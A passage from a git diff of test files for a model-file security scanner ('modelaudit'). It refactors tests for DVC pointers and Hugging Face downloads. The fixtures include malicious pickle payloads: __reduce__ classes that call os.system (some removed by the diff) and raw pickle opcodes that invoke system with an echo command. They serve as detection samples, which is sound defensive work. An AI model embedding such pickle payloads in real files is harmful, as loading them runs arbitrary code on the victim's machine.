"malicious.pkl" with malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) bundle_dir = tmp_path / "bundle" bundle_dir.mkdir() (bundle_dir / "linked").symlink_to(real_dir, target_is_directory=True) @@ -2736,7 +2674,7 @@ def test_over_limit_dvc_recurses_into_resolved_directory_output(self, tmp_path: model_dir.mkdir() nested_malicious = model_dir / "nested_malicious.pkl" with nested_malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_lines = ["outs:", f"- path: {model_dir.name}"] for index in range(99): @@ -2776,7 +2714,7 @@ def test_over_limit_dvc_directory_output_covers_complete_tail_after_sibling_gap( covered_payload = covered_subdir / "covered.pkl" covered_payload.write_bytes(pickle.dumps({"covered": True})) malicious = model_dir / "malicious.pkl" - malicious.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) incomplete = model_dir / "incomplete.pkl" incomplete.write_bytes(pickle.dumps({"incomplete": True})) _patch_metadata_only_incomplete_scan(monkeypatch, incomplete.name) @@ -2872,14 +2810,10 @@ def test_duplicate_only_output_limit_is_complete(self, tmp_path: Path) -> None: def test_partially_materialized_directory_output_fails_closed(self, tmp_path: Path) -> None: """Declared DVC file and byte lower bounds must not be silently underfilled.""" - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (os.system, ("echo dvc-partial-materialization",)) - output_dir = tmp_path / "model" output_dir.mkdir() payload = output_dir / "payload.pkl" - payload.write_bytes(pickle.dumps(MaliciousClass())) + payload.write_bytes(pickle.dumps(SystemCommandPayload("echo dvc-partial-materialization", lambda: os.system))) dvc_file = tmp_path / "partial.dvc" dvc_file.write_text(f"outs:\n- path: model\n size: {payload.stat().st_size + 100}\n nfiles: 2\n") @@ -3369,14 +3303,8 @@ def test_dvc_with_malicious_pickle(self, tmp_path): malicious_pickle = tmp_path / "malicious.pkl" # Create a pickle with suspicious content - class MaliciousClass: - def __reduce__(self): - import os - - return (os.system, ("echo 'malicious code'",)) - with malicious_pickle.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload("echo 'malicious code'"), f) # Create DVC file pointing to malicious pickle dvc_file = tmp_path / "malicious.dvc" @@ -3443,7 +3371,7 @@ def test_cli_directory_sibling_scans_malicious_omitted_output(self, tmp_path: Pa models_dir.mkdir() malicious = models_dir / "malicious.pkl" with malicious.open("wb") as f: - pickle.dump(_LateMaliciousPayload(), f) + pickle.dump(SystemCommandPayload("echo c085", lambda: os.system), f) dvc_file = tmp_path / "cli_directory_sibling.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 100 + "- path: models/malicious.pkl\n") @@ -3470,7 +3398,7 @@ def test_cli_directory_prior_coverage_survives_findings_and_incomplete_siblings( models_dir = tmp_path / "models" models_dir.mkdir() malicious = models_dir / "malicious.pkl" - malicious.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) incomplete = models_dir / "incomplete.pkl" incomplete.write_bytes(pickle.dumps({"incomplete": True})) _patch_metadata_only_incomplete_scan(monkeypatch, incomplete.name) @@ -3542,7 +3470,7 @@ def test_cli_complete_directory_prior_coverage_reports_malicious_tail_after_sibl covered_dir = models_dir / "covered" covered_dir.mkdir(parents=True) malicious = covered_dir / "malicious.pkl" - malicious.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) incomplete = models_dir / "incomplete.pkl" incomplete.write_bytes(pickle.dumps({"incomplete": True})) _patch_metadata_only_incomplete_scan(monkeypatch, incomplete.name) @@ -3761,7 +3689,7 @@ def test_cli_sibling_malicious_file_is_reported_when_cap_is_discharged(self, tmp benign = tmp_path / "benign.pkl" benign.write_bytes(pickle.dumps({"safe": True})) late = tmp_path / "late.pkl" - late.write_bytes(pickle.dumps(_LateMaliciousPayload())) + late.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) dvc_file = tmp_path / "late-output.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 100 + "- path: late.pkl\n") @@ -3846,7 +3774,7 @@ def test_cli_scanner_selection_credits_and_reports_selected_directory_descendant models_dir = tmp_path / "models" models_dir.mkdir() malicious = models_dir / "payload.pkl" - malicious.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) dvc_file = tmp_path / "selected-directory-output.dvc" dvc_file.write_text("outs:\n" + "- path: benign.pkl\n" * 100 + "- path: models/payload.pkl\n") @@ -3999,7 +3927,7 @@ def test_cli_capped_pointer_reports_malicious_explicit_file_in_omitted_directory models_dir = tmp_path / "models" models_dir.mkdir() malicious = models_dir / "malicious.pkl" - malicious.write_bytes(pickle.dumps(_LateMaliciousPayload())) + malicious.write_bytes(pickle.dumps(SystemCommandPayload("echo c085", lambda: os.system))) dvc_lines = ["outs:"] for index in range(100): filler = tmp_path / f"benign_{index:03}.pkl" @@ -4164,17 +4092,11 @@ def test_cli_partial_dvc_directory_output_scans_nested_payload(self, tmp_path: P from modelaudit.cli import cli - class MaliciousClass: - def __reduce__(self) -> tuple[object, tuple[str]]: - import os - - return (os.system, ("echo dvc-cli-directory-malicious",)) - output_dir = tmp_path / "model" output_dir.mkdir() nested_payload = output_dir / "nested.pkl" with nested_payload.open("wb") as f: - pickle.dump(MaliciousClass(), f) + pickle.dump(SystemCommandPayload("echo dvc-cli-directory-malicious"), f) dvc_file = tmp_path / "partial-directory.dvc" dvc_file.write_text("""outs: @@ -4265,3 +4187,14 @@ def test_cli_sbom_omits_fully_unresolved_dvc_pointer(self, tmp_path: Path) -> No assert result.exit_code == 2 components = json.loads(sbom_file.read_text()).get("components", []) assert not any(component["name"] == dvc_file.name for component in components) + + +def _record_scanned_paths(monkeypatch: pytest.MonkeyPatch, scanned_paths: list[str]) -> None: + def fake_scan_file(path: str, _config: dict[str, Any]) -> ScanResult: + scanned_paths.append(path) + result = ScanResult(scanner_name="test") + result.bytes_scanned = Path(path).stat().st_size + result.finish(success=True) + return result + + monkeypatch.setattr(core_module, "scan_file", fake_scan_file) diff --git a/tests/utils/sources/test_huggingface.py b/tests/utils/sources/test_huggingface.py index fea0d937c..2bde67853 100644 --- a/tests/utils/sources/test_huggingface.py +++ b/tests/utils/sources/test_huggingface.py @@ -17,6 +17,7 @@ import zipfile import zlib from collections.abc import Callable, Generator, Iterator +from functools import partial from io import BytesIO from pathlib import Path, PurePosixPath, PureWindowsPath from types import SimpleNamespace @@ -101,7 +102,28 @@ ) from modelaudit.utils.tensorflow_compat import has_tensorflow_protobuf_stubs from tests.helpers import create_mock_coreml, create_mock_onnx, is_huggingface_rate_limit_error -from tests.helpers.file_creators import malicious_pickle_bytes, valid_jpeg_bytes, valid_png_bytes +from tests.helpers.file_creators import ( + bert_vocab_payload as _bert_vocab_payload, +) +from tests.helpers.file_creators import ( + bpe_merges_payload as _bpe_merges_payload, +) +from tests.helpers.file_creators import ( + build_external_onnx_payload, + download_onnx_fixture, + download_onnx_only_fixture, + download_payload_fixture, + malicious_pickle_bytes, + valid_jpeg_bytes, + valid_png_bytes, +) +from tests.helpers.file_creators import ( + ubjson_key as _ubjson_key, +) +from tests.helpers.file_creators import ( + ubjson_string as _ubjson_string, +) +from tests.helpers.scanners import fail_onnx_bounded_discovery as fail_bounded_discovery _HF_TEST_REVISION = "a" * 40 @@ -394,27 +416,6 @@ def test_hf_download_path_comparison_accepts_equivalent_windows_extended_paths() ) == _normalize_windows_hf_download_path_for_comparison(unc_path) -def _bert_vocab_payload(min_bytes: int = 16 * 1024) -> bytes: - tokens = ["[PAD]", "[UNK]", "[CLS]", "[SEP]", "[MASK]"] - tokens.extend(f"[unused{index}]" for index in range(2048)) - tokens.extend(f"token_{index}" for index in range(2048)) - payload = ("\n".join(tokens) + "\n").encode("utf-8") - assert len(payload) > min_bytes - return payload - - -def _bpe_merges_payload(min_bytes: int = 3 * 1024 * 1024) -> bytes: - lines = ["#version: 0.2"] - total_bytes = len(lines[0]) + 1 - index = 0 - while total_bytes <= min_bytes: - line = f"token_{index % 8192} token_{(index * 17) % 8192}" - lines.append(line) - total_bytes += len(line) + 1 - index += 1 - return ("\n".join(lines) + "\n").encode("utf-8") - - class _FakeRangeResponse: def __init__( self, @@ -570,14 +571,6 @@ def _make_line_broken_printable_utf8_messagepack_candidate() -> bytes: return (b'""' + ("é" * 17).encode("utf-8") + b"\n") * 4097 -def _ubjson_key(key: bytes) -> bytes: - return b"U" + bytes([len(key)]) + key - - -def _ubjson_string(value: bytes) -> bytes: - return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value - - def _make_xgboost_ubjson_payload(*, malicious: bool = False) -> bytes: learner_body = _ubjson_key(b"learner_model_param") + b"{}" if malicious: @@ -699,26 +692,7 @@ def _make_onnx_payload(tmp_path: Path) -> bytes: def _make_external_onnx_payload(tmp_path: Path, external_path: str = "model.onnx_data") -> bytes: - onnx = pytest.importorskip("onnx") - from onnx import TensorProto, helper - from onnx.onnx_ml_pb2 import StringStringEntryProto - - tensor = helper.make_tensor("W", TensorProto.FLOAT, [1], vals=[1.0]) - tensor.data_location = onnx.TensorProto.EXTERNAL - entry = StringStringEntryProto() - entry.key = "location" - entry.value = external_path - tensor.external_data.append(entry) - graph = helper.make_graph( - [helper.make_node("Relu", ["input"], ["output"], name="relu")], - "external_data_graph", - [helper.make_tensor_value_info("input", TensorProto.FLOAT, [1])], - [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])], - initializer=[tensor], - ) - model_path = tmp_path / "fixture.onnx" - onnx.save(helper.make_model(graph), str(model_path)) - return model_path.read_bytes() + return build_external_onnx_payload(tmp_path, external_path, "external_data_graph") def test_hf_onnx_sidecar_discovery_reports_bounded_parse_failure( @@ -730,12 +704,6 @@ def test_hf_onnx_sidecar_discovery_reports_bounded_parse_failure( onnx_path = tmp_path / "model.onnx" onnx_path.write_bytes(_make_external_onnx_payload(tmp_path)) - def fail_bounded_discovery(*_args: Any, **_kwargs: Any) -> Any: - raise onnx_scanner._OnnxStructureParseError( - "retained_object_limit_exceeded", - "bounded discovery exhausted its retained-object budget", - ) - monkeypatch.setattr(onnx_scanner, "_load_onnx_structure_file_backed", fail_bounded_discovery) with pytest.raises( @@ -1447,20 +1415,7 @@ def test_list_repo_files_rejects_unknown_paginated_tree_item_types( tree_item: dict[str, object], ) -> None: """Unknown tree item types must not create a partial benign inventory.""" - mock_repo_info.return_value = SimpleNamespace(sha=_HF_TEST_REVISION) - mock_get_session.return_value.stream.return_value = _FakeTreeResponse( - [ - {"type": "file", "path": "benign.bin"}, - tree_item, - ] - ) - - repo_files, revision, error = _list_repo_files_with_timeout("test/model", timeout_seconds=7) - - assert repo_files is None - assert revision is None - assert error is not None - assert "unknown tree item type" in error + _assert_unsupported_hf_tree_item(mock_repo_info, mock_get_session, tree_item, ("unknown tree item type")) @pytest.mark.parametrize( "tree_item", @@ -1479,20 +1434,7 @@ def test_list_repo_files_rejects_malformed_paginated_file_entries( tree_item: dict[str, object], ) -> None: """Malformed file entries must fail closed before the inventory is accepted.""" - mock_repo_info.return_value = SimpleNamespace(sha=_HF_TEST_REVISION) - mock_get_session.return_value.stream.return_value = _FakeTreeResponse( - [ - {"type": "file", "path": "benign.bin"}, - tree_item, - ] - ) - - repo_files, revision, error = _list_repo_files_with_timeout("test/model", timeout_seconds=7) - - assert repo_files is None - assert revision is None - assert error is not None - assert "invalid repository filename" in error + _assert_unsupported_hf_tree_item(mock_repo_info, mock_get_session, tree_item, ("invalid repository filename")) @patch("huggingface_hub.utils.get_session") @patch("huggingface_hub.HfApi.repo_info") @@ -1806,12 +1748,7 @@ def test_download_model_includes_content_routed_skipped_file( (download_path / "evil.payload").write_bytes(b"\x08\x00\x00\x00TFL3" + b"\x00" * 16) mock_snapshot_download.return_value = str(download_path) - def get_side_effect(url: str, **_kwargs: object) -> _FakeRangeResponse: - if url.endswith("/evil.payload"): - return _FakeRangeResponse(b"\x08\x00\x00\x00TFL3" + b"\x00" * 16) - return _FakeRangeResponse(valid_png_bytes()) - - mock_requests_get.side_effect = get_side_effect + mock_requests_get.side_effect = _content_routed_probe_response download_model("https://huggingface.co/test/model") @@ -3581,13 +3518,7 @@ def test_missing_huggingface_hub_dependency(self): """Test error when huggingface-hub is not installed.""" real_import = __import__ with patch("builtins.__import__") as mock_import: - - def side_effect(name, *args, **kwargs): - if name == "huggingface_hub": - raise ImportError("No module named 'huggingface_hub'") - return real_import(name, *args, **kwargs) - - mock_import.side_effect = side_effect + mock_import.side_effect = _missing_hf_import(real_import) with pytest.raises(ImportError, match="huggingface-hub package is required"): download_model("https://huggingface.co/test/model") @@ -3880,15 +3811,7 @@ def test_content_probe_and_header_bytes_are_aggregated_before_early_limit( lambda *_args, **_kwargs: ({filename: len(frame)}, _HF_TEST_REVISION), ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(frame) - 1) - return _strict_range_response( - frame[start : end + 1], - len(frame), - start_offset=start, - url=url, - ) + range_response = partial(_range_response_for_frame, frame) with ( patch("requests.get", side_effect=range_response), @@ -4192,14 +4115,7 @@ def test_download_model_streaming_prefetches_openvino_bin_companion( ) -> None: """OpenVINO-only streaming must stage the exact .bin sidecar before yielding XML.""" - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / "huggingface" / "test" / "model" / filename - path.parent.mkdir(parents=True, exist_ok=True) - if filename.endswith(".xml"): - path.write_text("", encoding="utf-8") - else: - path.write_bytes(b"weights") - return str(path) + download_side_effect = partial(_download_openvino_fixture, tmp_path, ".xml") mock_hf_hub_download.side_effect = download_side_effect mock_detect_content.side_effect = lambda _repo_id, filename, _revision, _budget: ( @@ -4320,14 +4236,7 @@ def test_download_model_streaming_prefetches_multiple_openvino_bin_companions( ) -> None: """Pinned OpenVINO repositories can stage every exact XML/BIN pair before scanning.""" - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / "huggingface" / "test" / "model" / filename - path.parent.mkdir(parents=True, exist_ok=True) - if filename.endswith(".xml"): - path.write_text("", encoding="utf-8") - else: - path.write_bytes(b"weights") - return str(path) + download_side_effect = partial(_download_openvino_fixture, tmp_path, ".xml") mock_hf_hub_download.side_effect = download_side_effect mock_detect_content.side_effect = lambda _repo_id, filename, _revision, _budget: ( @@ -4380,14 +4289,7 @@ def test_download_model_streaming_prefetches_case_variant_duplicate_openvino_com ) -> None: """HF OpenVINO companion staging should keep duplicate basenames path-specific.""" - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / "huggingface" / "test" / "model" / filename - path.parent.mkdir(parents=True, exist_ok=True) - if filename.endswith(".XML"): - path.write_text("", encoding="utf-8") - else: - path.write_bytes(b"weights") - return str(path) + download_side_effect = partial(_download_openvino_fixture, tmp_path, ".XML") mock_hf_hub_download.side_effect = download_side_effect mock_detect_content.side_effect = lambda _repo_id, filename, _revision, _budget: ( @@ -4571,14 +4473,7 @@ def test_download_model_streaming_preserves_onnx_external_data_before_parent_yie payload = _make_external_onnx_payload(tmp_path) sidecar_bytes = struct.pack("f", 1.0) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_fixture, payload, sidecar_bytes) mock_get_paths_info.side_effect = [ [SimpleNamespace(path="onnx/model.onnx", size=len(payload))], [SimpleNamespace(path="onnx/model.onnx_data", size=len(sidecar_bytes))], @@ -5219,14 +5114,7 @@ def test_download_model_streaming_include_all_counts_selected_onnx_sidecar_once( payload = _make_external_onnx_payload(tmp_path) sidecar_bytes = struct.pack("f", 1.0) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_fixture, payload, sidecar_bytes) mock_get_paths_info.return_value = [ SimpleNamespace(path="onnx/model.onnx", size=len(payload)), SimpleNamespace(path="onnx/model.onnx_data", size=len(sidecar_bytes)), @@ -5294,14 +5182,7 @@ def track_interrupt() -> None: lambda *_args, **_kwargs: pytest.fail("HF sidecar discovery must not preload ONNX"), ) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_fixture, payload, sidecar_bytes) mock_get_paths_info.return_value = [ SimpleNamespace(path="onnx/model.onnx_data", size=len(sidecar_bytes)), SimpleNamespace(path="onnx/model.onnx", size=len(payload)), @@ -5354,14 +5235,7 @@ def test_download_model_streaming_include_all_refetches_deleted_selected_onnx_si payload = _make_external_onnx_payload(tmp_path) sidecar_bytes = struct.pack("f", 1.0) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_fixture, payload, sidecar_bytes) mock_get_paths_info.return_value = [ SimpleNamespace(path="onnx/model.onnx_data", size=len(sidecar_bytes)), SimpleNamespace(path="onnx/model.onnx", size=len(payload)), @@ -5570,15 +5444,7 @@ def test_download_model_streaming_blocks_oversized_onnx_external_data( payload = _make_external_onnx_payload(tmp_path) sidecar_size = 4 - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert filename == "onnx/model.onnx" - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_only_fixture, payload) mock_get_paths_info.side_effect = [ [SimpleNamespace(path="onnx/model.onnx", size=len(payload))], [SimpleNamespace(path="onnx/model.onnx_data", size=sidecar_size)], @@ -5674,18 +5540,13 @@ def test_download_model_streaming_includes_content_routed_skipped_file( ) -> None: """Streaming downloads should include renamed content-routed model files.""" - def get_side_effect(url: str, **_kwargs: object) -> _FakeRangeResponse: - if url.endswith("/evil.payload"): - return _FakeRangeResponse(b"\x08\x00\x00\x00TFL3" + b"\x00" * 16) - return _FakeRangeResponse(valid_png_bytes()) - def download_side_effect(*, repo_id: str, filename: str, **_kwargs: object) -> str: assert repo_id == "test/model" path = tmp_path / filename path.write_bytes(b"downloaded") return str(path) - mock_requests_get.side_effect = get_side_effect + mock_requests_get.side_effect = _content_routed_probe_response mock_hf_hub_download.side_effect = download_side_effect results = list(download_model_streaming("https://huggingface.co/test/model", _include_scan_results=True)) @@ -7148,12 +7009,7 @@ def test_download_model_streaming_selected_xgboost_routes_shard_shaped_renamed_u malicious_xgboost = _make_xgboost_ubjson_payload(malicious=True) mock_requests_get.return_value = _FakeRangeResponse(malicious_xgboost) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_xgboost) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, malicious_xgboost) results = list( download_model_streaming( @@ -7247,12 +7103,7 @@ def test_download_model_streaming_selected_xgboost_routes_noncanonical_shard_sha mock_list_repo_files.return_value = ([filename], _HF_TEST_REVISION, None) mock_requests_get.return_value = _FakeRangeResponse(malicious_xgboost) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_xgboost) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, malicious_xgboost) results = list( download_model_streaming( @@ -7329,12 +7180,7 @@ def test_download_model_streaming_selected_compressed_preserves_safetensors_shar ) mock_requests_get.return_value = _FakeRangeResponse(safetensors_shard) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(safetensors_shard) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, safetensors_shard) results = list( download_model_streaming( @@ -7373,12 +7219,7 @@ def test_download_model_streaming_compressed_extension_preserves_safetensors_sha ) mock_requests_get.return_value = _FakeRangeResponse(safetensors_shard) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(safetensors_shard) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, safetensors_shard) results = list( download_model_streaming( @@ -7456,12 +7297,7 @@ def test_download_model_streaming_public_pickle_extension_routes_shard_shaped_re malicious_pickle = b"cos\nsystem\n(S'echo pwn'\ntR." mock_requests_get.return_value = _FakeRangeResponse(malicious_pickle) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_pickle) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, malicious_pickle) results = list( download_model_streaming( @@ -7497,12 +7333,7 @@ def test_download_model_streaming_selected_pickle_routes_shard_shaped_renamed_pi malicious_pickle = b"cos\nsystem\n(S'echo pwn'\ntR." mock_requests_get.return_value = _FakeRangeResponse(malicious_pickle) - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_pickle) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_payload_fixture, tmp_path, malicious_pickle) results = list( download_model_streaming( @@ -7535,33 +7366,7 @@ def test_download_model_streaming_selected_pickle_preserves_safetensors_pickle_c tmp_path: Path, ) -> None: """Non-shard SafeTensors suffixes should still be probed for selected pickle payloads.""" - policy = resolve_scanner_selection_policy(scanners=["pickle"]) - malicious_pickle = b"cos\nsystem\n(S'echo pwn'\ntR." - mock_requests_get.return_value = _FakeRangeResponse(malicious_pickle) - - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_pickle) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect - - results = list( - download_model_streaming( - "https://huggingface.co/test/model", - scannable_extensions=selected_scanner_extensions(policy, conservative=True), - scannable_filenames=selected_scanner_filenames(policy, conservative=True), - scannable_scanner_ids=policy.enabled_scanner_ids, - ) - ) - - assert results == [(tmp_path / "payload.safetensors", True)] - assert mock_requests_get.call_count == 1 - mock_hf_hub_download.assert_called_once_with( - repo_id="test/model", - filename="payload.safetensors", - revision=_HF_TEST_REVISION, - ) + _assert_streamed_pickle_control(mock_hf_hub_download, mock_requests_get, tmp_path, "payload.safetensors") @patch( "modelaudit.utils.sources.huggingface._list_repo_files_with_timeout", @@ -7577,33 +7382,7 @@ def test_download_model_streaming_selected_pickle_preserves_renamed_malicious_co tmp_path: Path, ) -> None: """Unknown-suffix candidates should still be probed for selected malicious pickles.""" - policy = resolve_scanner_selection_policy(scanners=["pickle"]) - malicious_pickle = b"cos\nsystem\n(S'echo pwn'\ntR." - mock_requests_get.return_value = _FakeRangeResponse(malicious_pickle) - - def download_side_effect(*, filename: str, **_kwargs: object) -> str: - path = tmp_path / filename - path.write_bytes(malicious_pickle) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect - - results = list( - download_model_streaming( - "https://huggingface.co/test/model", - scannable_extensions=selected_scanner_extensions(policy, conservative=True), - scannable_filenames=selected_scanner_filenames(policy, conservative=True), - scannable_scanner_ids=policy.enabled_scanner_ids, - ) - ) - - assert results == [(tmp_path / "renamed.weights", True)] - assert mock_requests_get.call_count == 1 - mock_hf_hub_download.assert_called_once_with( - repo_id="test/model", - filename="renamed.weights", - revision=_HF_TEST_REVISION, - ) + _assert_streamed_pickle_control(mock_hf_hub_download, mock_requests_get, tmp_path, "renamed.weights") @patch( "modelaudit.utils.sources.huggingface._list_repo_files_with_timeout", @@ -8004,15 +7783,7 @@ def test_download_model_streaming_accounts_content_probe_before_header_ranges( lambda *_args, **_kwargs: ({filename: len(frame)}, _HF_TEST_REVISION), ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(frame) - 1) - return _strict_range_response( - frame[start : end + 1], - len(frame), - start_offset=start, - url=url, - ) + range_response = partial(_range_response_for_frame, frame) with ( patch("requests.get", side_effect=range_response) as mock_requests_get, @@ -8081,15 +7852,7 @@ def get_path_sizes( get_path_sizes, ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(frame) - 1) - return _strict_range_response( - frame[start : end + 1], - len(frame), - start_offset=start, - url=url, - ) + range_response = partial(_range_response_for_frame, frame) config_path = tmp_path / config_name @@ -10301,20 +10064,8 @@ def get_path_sizes( lambda *_args, **_kwargs: "safetensors", ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - filename = index_name if index_name in url else shard_name - payload = payloads[filename] - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(payload) - 1) - return _strict_range_response( - payload[start : end + 1], - len(payload), - start_offset=start, - url=url, - ) - with ( - patch("requests.get", side_effect=range_response), + patch("requests.get", side_effect=_index_range_response(index_name, shard_name, payloads)), patch("huggingface_hub.hf_hub_download") as mock_download, ): cache_dir = tmp_path / "cache" if use_cache_root else None @@ -10416,36 +10167,14 @@ def test_selected_failed_safetensors_index_is_counted_once_downstream( ), ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - filename = index_name if index_name in url else shard_name - payload = payloads[filename] - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(payload) - 1) - return _strict_range_response( - payload[start : end + 1], - len(payload), - start_offset=start, - url=url, - ) - streamed_items: list[ tuple[Path, bool] | tuple[Path, bool, Any] | tuple[Path, bool, Any | None, StreamedSourceByteAccounting] ] = [] - def tracked_stream() -> Iterator[ - tuple[Path, bool] | tuple[Path, bool, Any] | tuple[Path, bool, Any | None, StreamedSourceByteAccounting] - ]: - for item in download_model_streaming( - f"hf://test/model?revision={_HF_TEST_REVISION}", - max_size=4096, - scannable_scanner_ids={"safetensors"}, - _include_scan_results=True, - ): - streamed_items.append(item) - yield item + tracked_stream = partial(_tracked_safetensors_stream, streamed_items) with ( - patch("requests.get", side_effect=range_response), + patch("requests.get", side_effect=_index_range_response(index_name, shard_name, payloads)), patch("huggingface_hub.hf_hub_download") as mock_download, ): expected_bytes = 109 @@ -10544,15 +10273,7 @@ def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _ streamed_items: list[object] = [] - def tracked_stream() -> Iterator[Any]: - for item in download_model_streaming( - f"hf://test/model?revision={_HF_TEST_REVISION}", - max_size=4096, - scannable_scanner_ids={"safetensors"}, - _include_scan_results=True, - ): - streamed_items.append(item) - yield item + tracked_stream = partial(_tracked_safetensors_stream, streamed_items) with ( patch("requests.get", side_effect=range_response), @@ -10625,34 +10346,14 @@ def test_pretransferred_index_bytes_survive_early_stop_before_later_selected_ind ), ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - filename = index_name if index_name in url else shard_name - payload = payloads[filename] - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(payload) - 1) - return _strict_range_response( - payload[start : end + 1], - len(payload), - start_offset=start, - url=url, - ) - streamed_items: list[object] = [] - def tracked_stream() -> Iterator[Any]: - for item in download_model_streaming( - f"hf://test/model?revision={_HF_TEST_REVISION}", - max_size=4096, - scannable_scanner_ids={"safetensors"}, - _include_scan_results=True, - ): - streamed_items.append(item) - yield item + tracked_stream = partial(_tracked_safetensors_stream, streamed_items) expected_bytes = len(index_payload) + (69 if shard_first else 0) max_total_size = len(index_payload) - 1 with ( - patch("requests.get", side_effect=range_response), + patch("requests.get", side_effect=_index_range_response(index_name, shard_name, payloads)), patch("huggingface_hub.hf_hub_download") as mock_download, ): aggregate = scan_model_streaming( @@ -11489,10 +11190,7 @@ def test_download_model_streaming_charges_malformed_header_bytes( lambda *_args, **_kwargs: ({filename: len(frame)}, _HF_TEST_REVISION), ) - def range_response(url: str, *, headers: dict[str, str], **_kwargs: object) -> _FakeRangeResponse: - start_text, end_text = headers["Range"].removeprefix("bytes=").split("-", 1) - start, end = int(start_text), min(int(end_text), len(frame) - 1) - return _strict_range_response(frame[start : end + 1], len(frame), start_offset=start, url=url) + range_response = 